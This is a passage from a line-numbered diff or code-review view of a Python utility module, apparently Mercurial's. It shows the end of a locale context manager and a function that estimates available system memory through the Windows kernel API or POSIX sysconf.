3620 3620 except locale.Error:
3621 3621 # The likely case is that the locale from the environment
3622 3622 # variables is unknown.
3623 3623 pass
3624 3624 yield
3625 3625 finally:
3626 3626 locale.setlocale(locale.LC_CTYPE, oldloc)
3627 3627 else:
3628 3628 yield
3629
3630
3631 def _estimatememory():
3632 """Provide an estimate for the available system memory in Bytes.
3633
3634 If no estimate can be provided on the platform, returns None.
3635 """
3636 if pycompat.sysplatform.startswith(b'win'):
3637 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3638 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3639 from ctypes.wintypes import Structure, byref, sizeof, windll
3640
3641 class MEMORYSTATUSEX(Structure):
3642 _fields_ = [
3643 ('dwLength', DWORD),
3644 ('dwMemoryLoad', DWORD),
3645 ('ullTotalPhys', DWORDLONG),
3646 ('ullAvailPhys', DWORDLONG),
3647 ('ullTotalPageFile', DWORDLONG),
3648 ('ullAvailPageFile', DWORDLONG),
3649 ('ullTotalVirtual', DWORDLONG),
3650 ('ullAvailVirtual', DWORDLONG),
3651 ('ullExtendedVirtual', DWORDLONG),
3652 ]
3653
3654 x = MEMORYSTATUSEX()
3655 x.dwLength = sizeof(x)
3656 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3657 return x.ullAvailPhys
3658
3659 # On newer Unix-like systems and Mac OSX, the sysconf interface
3660 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3661 # seems to be implemented on most systems.
3662 try:
3663 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3664 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3665 return pagesize * pages
3666 except OSError: # sysconf can fail
3667 pass
3668 except KeyError: # unknown parameter
3669 pass
General Comments 0
You need to be logged in to leave comments. Login now